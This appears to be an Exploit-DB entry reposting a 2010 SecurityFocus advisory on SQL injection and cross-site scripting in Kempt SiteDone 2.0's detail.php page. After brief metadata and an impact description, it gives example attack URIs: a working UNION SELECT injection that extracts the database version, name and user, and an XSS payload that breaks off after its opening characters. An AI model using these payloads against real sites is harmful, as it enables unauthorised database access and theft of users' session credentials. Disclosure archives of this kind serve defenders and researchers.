Kempt SiteDone 2.0 - '/detail.php' Cross-Site Scripting / SQL Injection

EDB-ID:

33776

CVE:

N/A


Author:

d3v1l

Type:

webapps


Platform:

PHP

Date:

2010-03-18


source: https://www.securityfocus.com/bid/38856/info

Kempt SiteDone is prone to an SQL-injection vulnerability and cross-site scripting vulnerability.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Kempt SiteDone 2.0 is vulnerable; other versions may also be affected. 


The following example URIs are available:

http://www.example.com/site/store/detail.php?articleId=-1 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19--

http://www.example.com/site/store/detail.php?articleId=">